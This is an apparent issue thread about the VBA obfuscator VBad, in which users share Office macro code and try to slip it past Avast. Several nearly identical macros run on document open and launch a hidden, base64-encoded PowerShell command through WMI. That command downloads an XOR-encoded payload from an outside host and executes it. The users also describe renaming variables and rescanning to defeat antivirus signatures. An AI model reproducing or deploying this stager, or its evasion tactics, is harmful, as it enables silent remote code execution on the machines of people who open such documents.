Hi,
I tried a normally prepared VBA sample obfuscated with VBad on VirusTotal: 0 detections. Your VBA itself must contain a function that triggers an Avast signature. I ran a few tests and I think it is the Shell() function (I tried both variants, and only the one with Shell() was caught).
But since this is not directly related to VBad, I am closing the issue.
Pepitoh.
Would you be so kind as to share examples of the macros you use, so I can base my own on them?
You can take, for instance, the example available in the git repository.
Are there other infection examples?
I would be highly interested too.
Sub [rdm::8]AutoOpen()[!!] [rdm::8]Debugging[!!] End Sub
Sub [rdm::8]Document_Open()[!!] [rdm::8]Debugging[!!] End Sub
Public Function [rdm::8]Debugging()[!!] As Variant Dim Str As String str = "powershell.exe -NoP -sta -NonI -W Hidden -Enc WwBT" str = str + "AHkAUwB0AEUAbQAuAE4AZQBUAC4AUwBFAFIAdgBpAEMARQBQAE" str = str + "8ASQBuAFQATQBhAE4AQQBnAGUAcgBdADoAOgBFAFgAUABlAGMA" str = str + "VAAxADAAMABDAE8ATgB0AGkATgBVAGUAIAA9ACAAMAA7ACQAVw" str = str + "BjAD0ATgBFAFcALQBPAGIASgBlAEMAVAAgAFMAWQBTAHQAZQBt" str = str + "AC4ATgBFAFQALgBXAGUAQgBDAEwAaQBlAE4AdAA7ACQAdQA9AC" str = str + "cATQBvAHoAaQBsAGwAYQAvADUALgAwACAAKABXAGkAbgBkAG8A" str = str + "dwBzACAATgBUACAANgAuADEAOwAgAFcATwBXADYANAA7ACAAVA" str = str + "ByAGkAZABlAG4AdAAvADcALgAwADsAIAByAHYAOgAxADEALgAw" str = str + "ACkAIABsAGkAawBlACAARwBlAGMAawBvACcAOwAkAHcAYwAuAE" str = str + "gAZQBBAEQARQBSAFMALgBBAEQARAAoACcAVQBzAGUAcgAtAEEA" str = str + "ZwBlAG4AdAAnACwAJAB1ACkAOwAkAFcAQwAuAFAAUgBvAHgAWQ" str = str + "AgAD0AIABbAFMAeQBTAHQARQBtAC4ATgBlAHQALgBXAEUAQgBS" str = str + "AGUAUQBVAEUAUwB0AF0AOgA6AEQAZQBGAEEAdQBMAHQAVwBlAG" str = str + "IAUAByAE8AWABZADsAJABXAEMALgBQAHIAbwBYAFkALgBDAFIA" str = str + "ZQBEAGUATgB0AGkAYQBsAFMAIAA9ACAAWwBTAFkAUwB0AEUAbQ" str = str + "AuAE4ARQBUAC4AQwByAEUAZABFAE4AdABJAEEAbABDAEEAYwBI" str = str + "AEUAXQA6ADoARABFAGYAYQBVAEwAdABOAEUAVAB3AE8AcgBrAE" str = str + "MAUgBlAGQAZQBuAFQASQBhAGwAUwA7ACQASwA9ACcANwAlAHkA" str = str + "LgBBAGgAIwAzAEQAZAB1AEYAdAB2AEUAVQByAF8ATABpAG0AMg" str = str + "BaAFYAbgB4AGoAYAA2AGEAKgBUACcAOwAkAGkAPQAwADsAWwBj" str = str + "AEgAYQBSAFsAXQBdACQAQgA9ACgAWwBjAGgAQQByAFsAXQBdAC" str = str + "gAJABXAEMALgBEAE8AdwBOAEwATwBBAEQAUwBUAFIAaQBOAEcA" str = str + "KAAiAGgAdAB0AHAAOgAvAC8AbQBtAHMAbgBtAGkAYwByAG8Acw" str = str + "BvAGYAdAAuAGQAdQBjAGsAZABuAHMALgBvAHIAZwA6ADgAMAAx" str = str + "AC8AaQBuAGQAZQB4AC4AYQBzAHAAIgApACkAKQB8ACUAewAkAF" str = str + "8ALQBCAFgAbwBSACQAawBbACQASQArACsAJQAkAGsALgBMAGUA" str = str + "TgBHAFQAaABdAH0AOwBJAEUAWAAgACgAJABCAC0AagBPAEkAbg" str = str + "AnACcAKQA=" Const [rdm::8]HIDDEN_WINDOW = 0[!!] [rdm::8]strComputer = "."[!!] 
Set [rdm::8]objWMIService = GetObject("winmgmts:\" & strComputer & "\root\cimv2")[!!] Set [rdm::8]objStartup = objWMIService.Get("Win32ProcessStartup")[!!] Set [rdm::8]objConfig = objStartup.SpawnInstance [!!] [rdm::8]objConfig.ShowWindow = HIDDEN_WINDOW[!!] Set [rdm::8]objProcess = GetObject("winmgmts:\" & strComputer & "\root\cimv2:Win32_Process")[!!] [rdm::8]objProcess.Create str, Null, objConfig, intProcessID[!!] End Function
What is the problem?
Sub [rdm::8]AutoOpen()[!!] [rdm::8]Debugging[!!] End Sub
Sub [rdm::8]Document_Open()[!!] [rdm::8]Debugging[!!] End Sub
Public Function [rdm::8]Debugging()[!!] As Variant Dim Str As String [rdm::8]str[!!] = "powershell.exe -NoP -sta -NonI -W Hidden -Enc WwBT" [rdm::8]str = str +[!!] "AHkAUwB0AEUAbQAuAE4AZQBUAC4AUwBFAFIAdgBpAEMARQBQAE" [rdm::8]str = str +[!!] "8ASQBuAFQATQBhAE4AQQBnAGUAcgBdADoAOgBFAFgAUABlAGMA" [rdm::8]str = str +[!!] "VAAxADAAMABDAE8ATgB0AGkATgBVAGUAIAA9ACAAMAA7ACQAVw" [rdm::8]str = str +[!!] "BjAD0ATgBFAFcALQBPAGIASgBlAEMAVAAgAFMAWQBTAHQAZQBt" [rdm::8]str = str +[!!] "AC4ATgBFAFQALgBXAGUAQgBDAEwAaQBlAE4AdAA7ACQAdQA9AC" [rdm::8]str = str +[!!] "cATQBvAHoAaQBsAGwAYQAvADUALgAwACAAKABXAGkAbgBkAG8A" [rdm::8]str = str +[!!] "dwBzACAATgBUACAANgAuADEAOwAgAFcATwBXADYANAA7ACAAVA" [rdm::8]str = str +[!!] "ByAGkAZABlAG4AdAAvADcALgAwADsAIAByAHYAOgAxADEALgAw" [rdm::8]str = str +[!!] "ACkAIABsAGkAawBlACAARwBlAGMAawBvACcAOwAkAHcAYwAuAE" [rdm::8]str = str +[!!] "gAZQBBAEQARQBSAFMALgBBAEQARAAoACcAVQBzAGUAcgAtAEEA" [rdm::8]str = str +[!!] "ZwBlAG4AdAAnACwAJAB1ACkAOwAkAFcAQwAuAFAAUgBvAHgAWQ" [rdm::8]str = str +[!!] "AgAD0AIABbAFMAeQBTAHQARQBtAC4ATgBlAHQALgBXAEUAQgBS" [rdm::8]str = str +[!!] "AGUAUQBVAEUAUwB0AF0AOgA6AEQAZQBGAEEAdQBMAHQAVwBlAG" [rdm::8]str = str +[!!] "IAUAByAE8AWABZADsAJABXAEMALgBQAHIAbwBYAFkALgBDAFIA" [rdm::8]str = str +[!!] "ZQBEAGUATgB0AGkAYQBsAFMAIAA9ACAAWwBTAFkAUwB0AEUAbQ" [rdm::8]str = str +[!!] "AuAE4ARQBUAC4AQwByAEUAZABFAE4AdABJAEEAbABDAEEAYwBI" [rdm::8]str = str +[!!] "AEUAXQA6ADoARABFAGYAYQBVAEwAdABOAEUAVAB3AE8AcgBrAE" [rdm::8]str = str +[!!] "MAUgBlAGQAZQBuAFQASQBhAGwAUwA7ACQASwA9ACcANwAlAHkA" [rdm::8]str = str +[!!] "LgBBAGgAIwAzAEQAZAB1AEYAdAB2AEUAVQByAF8ATABpAG0AMg" [rdm::8]str = str +[!!] "BaAFYAbgB4AGoAYAA2AGEAKgBUACcAOwAkAGkAPQAwADsAWwBj" [rdm::8]str = str +[!!] "AEgAYQBSAFsAXQBdACQAQgA9ACgAWwBjAGgAQQByAFsAXQBdAC" [rdm::8]str = str +[!!] "gAJABXAEMALgBEAE8AdwBOAEwATwBBAEQAUwBUAFIAaQBOAEcA" [rdm::8]str = str +[!!] "KAAiAGgAdAB0AHAAOgAvAC8AbQBtAHMAbgBtAGkAYwByAG8Acw" [rdm::8]str = str +[!!] 
"BvAGYAdAAuAGQAdQBjAGsAZABuAHMALgBvAHIAZwA6ADgAMAAx" [rdm::8]str = str +[!!] "AC8AaQBuAGQAZQB4AC4AYQBzAHAAIgApACkAKQB8ACUAewAkAF" [rdm::8]str = str +[!!] "8ALQBCAFgAbwBSACQAawBbACQASQArACsAJQAkAGsALgBMAGUA" [rdm::8]str = str +[!!] "TgBHAFQAaABdAH0AOwBJAEUAWAAgACgAJABCAC0AagBPAEkAbg" [rdm::8]str = str +[!!] "AnACcAKQA=" Const [rdm::8]HIDDEN_WINDOW = 0[!!] [rdm::8]strComputer = "."[!!] Set [rdm::8]objWMIService = GetObject("winmgmts:\" & strComputer & "\root\cimv2")[!!] Set [rdm::8]objStartup = objWMIService.Get("Win32ProcessStartup")[!!] Set [rdm::8]objConfig = objStartup.SpawnInstance [!!] [rdm::8]objConfig.ShowWindow = HIDDEN_WINDOW[!!] Set [rdm::8]objProcess = GetObject("winmgmts:\" & strComputer & "\root\cimv2:Win32_Process")[!!] [rdm::8]objProcess.Create str, Null, objConfig, intProcessID[!!] End Function
Sub [rdm::8]AutoOpen()[!!] [rdm::8]Debugging[!!] End Sub
Sub [rdm::8]Document_Open()[!!] [rdm::8]Debugging[!!] End Sub
Public Function [rdm::8]Debugging()[!!] As Variant Dim Azh As String [rdm::8]azh[!!] = "powershel" [rdm::8]azh = azh +[!!] "l.exe -NoP -sta -NonI -W Hidden -Enc WwBT" [rdm::8]azh = azh +[!!] "AHkAUwB0AEUAbQAuAE4AZQBUAC4AUwBFAFIAdgBpAEMARQBQAE" [rdm::8]azh = azh +[!!] "8ASQBuAFQATQBhAE4AQQBnAGUAcgBdADoAOgBFAFgAUABlAGMA" [rdm::8]azh = azh +[!!] "VAAxADAAMABDAE8ATgB0AGkATgBVAGUAIAA9ACAAMAA7ACQAVw" [rdm::8]azh = azh +[!!] "BjAD0ATgBFAFcALQBPAGIASgBlAEMAVAAgAFMAWQBTAHQAZQBt" [rdm::8]azh = azh +[!!] "AC4ATgBFAFQALgBXAGUAQgBDAEwAaQBlAE4AdAA7ACQAdQA9AC" [rdm::8]azh = azh +[!!] "cATQBvAHoAaQBsAGwAYQAvADUALgAwACAAKABXAGkAbgBkAG8A" [rdm::8]azh = azh +[!!] "dwBzACAATgBUACAANgAuADEAOwAgAFcATwBXADYANAA7ACAAVA" [rdm::8]azh = azh +[!!] "ByAGkAZABlAG4AdAAvADcALgAwADsAIAByAHYAOgAxADEALgAw" [rdm::8]azh = azh +[!!] "ACkAIABsAGkAawBlACAARwBlAGMAawBvACcAOwAkAHcAYwAuAE" [rdm::8]azh = azh +[!!] "gAZQBBAEQARQBSAFMALgBBAEQARAAoACcAVQBzAGUAcgAtAEEA" [rdm::8]azh = azh +[!!] "ZwBlAG4AdAAnACwAJAB1ACkAOwAkAFcAQwAuAFAAUgBvAHgAWQ" [rdm::8]azh = azh +[!!] "AgAD0AIABbAFMAeQBTAHQARQBtAC4ATgBlAHQALgBXAEUAQgBS" [rdm::8]azh = azh +[!!] "AGUAUQBVAEUAUwB0AF0AOgA6AEQAZQBGAEEAdQBMAHQAVwBlAG" [rdm::8]azh = azh +[!!] "IAUAByAE8AWABZADsAJABXAEMALgBQAHIAbwBYAFkALgBDAFIA" [rdm::8]azh = azh +[!!] "ZQBEAGUATgB0AGkAYQBsAFMAIAA9ACAAWwBTAFkAUwB0AEUAbQ" [rdm::8]azh = azh +[!!] "AuAE4ARQBUAC4AQwByAEUAZABFAE4AdABJAEEAbABDAEEAYwBI" [rdm::8]azh = azh +[!!] "AEUAXQA6ADoARABFAGYAYQBVAEwAdABOAEUAVAB3AE8AcgBrAE" [rdm::8]azh = azh +[!!] "MAUgBlAGQAZQBuAFQASQBhAGwAUwA7ACQASwA9ACcANwAlAHkA" [rdm::8]azh = azh +[!!] "LgBBAGgAIwAzAEQAZAB1AEYAdAB2AEUAVQByAF8ATABpAG0AMg" [rdm::8]azh = azh +[!!] "BaAFYAbgB4AGoAYAA2AGEAKgBUACcAOwAkAGkAPQAwADsAWwBj" [rdm::8]azh = azh +[!!] "AEgAYQBSAFsAXQBdACQAQgA9ACgAWwBjAGgAQQByAFsAXQBdAC" [rdm::8]azh = azh +[!!] "gAJABXAEMALgBEAE8AdwBOAEwATwBBAEQAUwBUAFIAaQBOAEcA" [rdm::8]azh = azh +[!!] "KAAiAGgAdAB0AHAAOgAvAC8AbQBtAHMAbgBtAGkAYwByAG8Acw" [rdm::8]azh = azh +[!!] 
"BvAGYAdAAuAGQAdQBjAGsAZABuAHMALgBvAHIAZwA6ADgAMAAx" [rdm::8]azh = azh +[!!] "AC8AaQBuAGQAZQB4AC4AYQBzAHAAIgApACkAKQB8ACUAewAkAF" [rdm::8]azh = azh +[!!] "8ALQBCAFgAbwBSACQAawBbACQASQArACsAJQAkAGsALgBMAGUA" [rdm::8]azh = azh +[!!] "TgBHAFQAaABdAH0AOwBJAEUAWAAgACgAJABCAC0AagBPAEkAbg" [rdm::8]azh = azh +[!!] "AnACcAKQA=" Const [rdm::8]HIDDEN_WINDOW = 0[!!] Dim [rdm::8]azhComputer[!!] Dim [rdm::8]objConfig[!!] Dim [rdm::8]objProcess[!!] Dim [rdm::8]objStartup[!!] Dim [rdm::8]objWMIService[!!] Dim [rdm::8]intProcessID[!!] [rdm::8]azhComputer = "."[!!] Set [rdm::8]objWMIService = GetObject("winmgmts:\" & azhComputer & "\root\cimv2")[!!] Set [rdm::8]objStartup = objWMIService.Get("Win32ProcessStartup")[!!] Set [rdm::8]objConfig = objStartup.SpawnInstance [!!] [rdm::8]objConfig.ShowWindow = HIDDEN_WINDOW[!!] Set [rdm::8]objProcess = GetObject("winmgmts:\" & azhComputer & "\root\cimv2:Win32_Process")[!!] [rdm::8]objProcess.Create azh, Null, objConfig, intProcessID[!!] End Function
This is impossible :'(
Sub [rdm::8]AutoOpen()[!!] [rdm::8]Debugging[!!] End Sub
Sub [rdm::8]Document_Open()[!!] [rdm::8]Debugging[!!] End Sub
Public Function [rdm::8]Debugging()[!!] As Variant Dim [rdm::8]Azh[!!] [rdm::8]azh[!!] = "powershel" [rdm::8]azh = azh +[!!] "l.exe -NoP -sta -NonI -W Hidden -Enc WwBT" [rdm::8]azh = azh +[!!] "AHkAUwB0AEUAbQAuAE4AZQBUAC4AUwBFAFIAdgBpAEMARQBQAE" [rdm::8]azh = azh +[!!] "8ASQBuAFQATQBhAE4AQQBnAGUAcgBdADoAOgBFAFgAUABlAGMA" [rdm::8]azh = azh +[!!] "VAAxADAAMABDAE8ATgB0AGkATgBVAGUAIAA9ACAAMAA7ACQAVw" [rdm::8]azh = azh +[!!] "BjAD0ATgBFAFcALQBPAGIASgBlAEMAVAAgAFMAWQBTAHQAZQBt" [rdm::8]azh = azh +[!!] "AC4ATgBFAFQALgBXAGUAQgBDAEwAaQBlAE4AdAA7ACQAdQA9AC" [rdm::8]azh = azh +[!!] "cATQBvAHoAaQBsAGwAYQAvADUALgAwACAAKABXAGkAbgBkAG8A" [rdm::8]azh = azh +[!!] "dwBzACAATgBUACAANgAuADEAOwAgAFcATwBXADYANAA7ACAAVA" [rdm::8]azh = azh +[!!] "ByAGkAZABlAG4AdAAvADcALgAwADsAIAByAHYAOgAxADEALgAw" [rdm::8]azh = azh +[!!] "ACkAIABsAGkAawBlACAARwBlAGMAawBvACcAOwAkAHcAYwAuAE" [rdm::8]azh = azh +[!!] "gAZQBBAEQARQBSAFMALgBBAEQARAAoACcAVQBzAGUAcgAtAEEA" [rdm::8]azh = azh +[!!] "ZwBlAG4AdAAnACwAJAB1ACkAOwAkAFcAQwAuAFAAUgBvAHgAWQ" [rdm::8]azh = azh +[!!] "AgAD0AIABbAFMAeQBTAHQARQBtAC4ATgBlAHQALgBXAEUAQgBS" [rdm::8]azh = azh +[!!] "AGUAUQBVAEUAUwB0AF0AOgA6AEQAZQBGAEEAdQBMAHQAVwBlAG" [rdm::8]azh = azh +[!!] "IAUAByAE8AWABZADsAJABXAEMALgBQAHIAbwBYAFkALgBDAFIA" [rdm::8]azh = azh +[!!] "ZQBEAGUATgB0AGkAYQBsAFMAIAA9ACAAWwBTAFkAUwB0AEUAbQ" [rdm::8]azh = azh +[!!] "AuAE4ARQBUAC4AQwByAEUAZABFAE4AdABJAEEAbABDAEEAYwBI" [rdm::8]azh = azh +[!!] "AEUAXQA6ADoARABFAGYAYQBVAEwAdABOAEUAVAB3AE8AcgBrAE" [rdm::8]azh = azh +[!!] "MAUgBlAGQAZQBuAFQASQBhAGwAUwA7ACQASwA9ACcANwAlAHkA" [rdm::8]azh = azh +[!!] "LgBBAGgAIwAzAEQAZAB1AEYAdAB2AEUAVQByAF8ATABpAG0AMg" [rdm::8]azh = azh +[!!] "BaAFYAbgB4AGoAYAA2AGEAKgBUACcAOwAkAGkAPQAwADsAWwBj" [rdm::8]azh = azh +[!!] "AEgAYQBSAFsAXQBdACQAQgA9ACgAWwBjAGgAQQByAFsAXQBdAC" [rdm::8]azh = azh +[!!] "gAJABXAEMALgBEAE8AdwBOAEwATwBBAEQAUwBUAFIAaQBOAEcA" [rdm::8]azh = azh +[!!] "KAAiAGgAdAB0AHAAOgAvAC8AbQBtAHMAbgBtAGkAYwByAG8Acw" [rdm::8]azh = azh +[!!] 
"BvAGYAdAAuAGQAdQBjAGsAZABuAHMALgBvAHIAZwA6ADgAMAAx" [rdm::8]azh = azh +[!!] "AC8AaQBuAGQAZQB4AC4AYQBzAHAAIgApACkAKQB8ACUAewAkAF" [rdm::8]azh = azh +[!!] "8ALQBCAFgAbwBSACQAawBbACQASQArACsAJQAkAGsALgBMAGUA" [rdm::8]azh = azh +[!!] "TgBHAFQAaABdAH0AOwBJAEUAWAAgACgAJABCAC0AagBPAEkAbg" [rdm::8]azh = azh +[!!] "AnACcAKQA=" Const [rdm::8]HIDDEN_WINDOW = 0[!!] Dim [rdm::8]azhComputer[!!] Dim [rdm::8]objConfig[!!] Dim [rdm::8]objProcess[!!] Dim [rdm::8]objStartup[!!] Dim [rdm::8]objWMIService[!!] Dim [rdm::8]intProcessID[!!] [rdm::8]azhComputer = "."[!!] Set [rdm::8]objWMIService = GetObject("winmgmts:\" & azhComputer & "\root\cimv2")[!!] Set [rdm::8]objStartup = objWMIService.Get("Win32ProcessStartup")[!!] Set [rdm::8]objConfig = objStartup.SpawnInstance [!!] [rdm::8]objConfig.ShowWindow = HIDDEN_WINDOW[!!] Set [rdm::8]objProcess = GetObject("winmgmts:\" & azhComputer & "\root\cimv2:Win32_Process")[!!] [rdm::8]objProcess.Create azh, Null, objConfig, intProcessID[!!] End Function
http://nodistribute.com/result/ZXMKCHe2Fokl7OJBTdD — nothing works; Avast is a god!
http://nodistribute.com/result/DMNXkzbWmc4eAwR